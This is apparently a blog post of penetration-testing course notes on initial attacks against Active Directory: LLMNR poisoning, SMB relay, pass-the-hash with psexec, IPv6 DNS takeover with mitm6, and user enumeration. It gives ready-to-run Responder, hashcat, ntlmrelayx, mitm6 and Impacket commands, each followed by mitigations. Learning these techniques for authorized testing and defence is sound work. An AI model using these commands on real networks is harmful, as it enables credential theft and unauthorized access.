637 words
3 minutes
PEH notes - Active Directory 2
2024-12-14
Practical Ethical Hacking
Active Directory

Attacking Active Directory: Initial Attack Vectors#

LLMNR Poisoning#

LLMNR: Link Local Multicast Name Resolution (previously NBT-NS)

⁉️ Used to identify hosts when DNS fails to do so ⁉️

Is it bad? YEAH. The key flaw is that the services utilize a user’s username and NTLMv2 hash when appropriately responded to.

—> MITM attack

Overview#

image.png

Steps of the attack (How?)#

  1. Run Responder

    sudo responder -I <net_interface> -dwP -v

    This tool will going to “respond” to the traffic (depending on the configuration file)

  2. An Event occurs (from the victim machine)

  3. Get the user’s username and his hash

  4. Crack the hash

    hashcat -m 5600 <hash_file> <wordlist_path>

Responder#

sudo responder -I <net_interface> -dwP -v
  • -I: network interface
  • -dwP: enable answers for DHCP broadcast requests + WPAD rogue server + force NTLM auth (Proxy)
  • -v: verbose

After some traffic and fake events, we get some response:

image.png

We have now the NTLMv2-SSP Username and the NTLMv2-SSP Hash. Go now crack it with hashcat

Hashcat#

# Get the cracking mode (-m)
# NTLMv2 = 5600
hashcat --help | grep NTLM
hashcat -m 5600 hash.txt /opt/rockyou.txt
  • -m: cracking mode

When it comes to the real world, rockyou.txt is not enough ⚠️ You need to personalize your passwords wordlist with specificities about the location or the company. We need also to use some rules (https://github.com/NotSoSecure/password_cracking_rules). Overall, it will be more efficient.

Mitigations#

  1. Disable LLMNR and NBT-NS
  2. If it’s not possible,
    1. Require Network Access Control
    2. Require strong user passwords

SMB Relay#

Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access through SMB.

Requirements:

  • SMB Signing must be disabled or not enforced on the target
  • Relayed user credentials must be local admin on machine for any real value

Steps of the attack (How?)#

  1. Identify hosts without SMB Signing

    nmap --script=smb2-security-mode.nse -p445 <victim_ip> [-Pn]

    This is what we search:

image.png

  1. Modify Responder configuration file & Run it

    /etc/responder/Responder.conf: set SMB and HTTP = Off because we don’t want to capture the hashes but to relay them

    sudo responder -I <net_interface> -dwP -v

  2. Setup the relay with ntlmrelayx.py

    ntlmrelayx.py -tf <targets_file> -smb2support

  3. An Event occurs (from the victim machine)

  4. Win (dump all local SAM hashes) 🔥

    image.png

  5. Others wins

    1. Get an interactive shell (by adding the option -i to the ntlmrelayx.py command)

      image.png

      And now, just use nc to connect to the shell

    2. Run command (by adding the option -c <command> to the ntlmrelayx.py command)

Mitigations#

  • Enable SMB Signing on all devices
  • Disable NTLM authentification on network
  • Account tiering
  • Local admin restriction

Gaining Shell Access#

Using psexec/wmiexec/smbexec#

  1. With the password:

    psexec.py <domain>/<user>:'<password>'@<IP>

  2. With the hash directly (always all the hash) and without the domain (because of local attack):

    psexec.py <user>@<IP> -hashes <LM:NT>

IPv6 Attacks#

Overview#

Because every machines have their IPv6 on but they don’t use it, they also don’t have a DNS for it. This is where we can work to try some attacks.

⚠️ 5 to 10 min max during this attack ⚠️

DNS Takeover via mitm6#

  1. Run ntlmrelayx.py:

    ntlmrelayx.py -6 -t ldaps://<IP> -wh fakewpad.<domain> -l <output_folder_name>

  2. Run mitm6: (can impact a lot the network. Don’t let this run during a long time ⚠️)

    sudo mitm6 -i <interface> -d <domain>

  3. Waiting for an event occurs (simply just a reboot, login, etc.)

  4. Relay this event to the domain controller (what we get depends on the user who trigger the event)

  5. Check inside <output_folder_name>:

    We can get a lot of information (domain_computers, domain_groups, domain_users, etc.)

  6. In case of a loginevent, mitm6 will create a user on the machine to perform a DCSync later with secretsdump.py

Mitigations#

  • Disable IPv6 (but not preferably option)
  • Add some rules
  • Disable WPAD with GPO & WinHttpAutoProxySrv service
  • Enable LDAP Signing & LDAP channel binding

Pass-back Attacks#

IOT / Printers attacks

LDAP / SMB connections and redirect the connection to our machine and grab the creds in clear-text ⚠️

https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/

Initial Internal Attack Strategy#

image.png

Other tools#

  • kerbrute brute force to enumerate users (need to know the format)

  • enum4linux

  • ldapsearch

  • rpcclient

  • crackmapexec to enumerate users by brute forcing RIDs

    crackmapexec smb <IP> -u 'guest' -p '' --rid-brute

  • Kerberoasting: we can use this technique even if we don’t have password. We can also perform users spraying

    GetNPUsers.py <domain>/ -usersfile <users_file> -no-pass -dc-ip <dc_ip>

    🔥 Use the command below to be synchronize with the DC to avoid the KRB_AP_ERR_SKEW error

    faketime "$(rdate -n $DC_IP -p | awk '{print $2, $3, $4}' | date -f - "+%Y-%m-%d %H:%M:%S")" zsh
PEH notes - Active Directory 2
https://fzfstormz.github.io/posts/peh-notes/peh-notes---active-directory-2/
Author
Meitoka
Published at
2024-12-14
© 2025 Meitoka. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari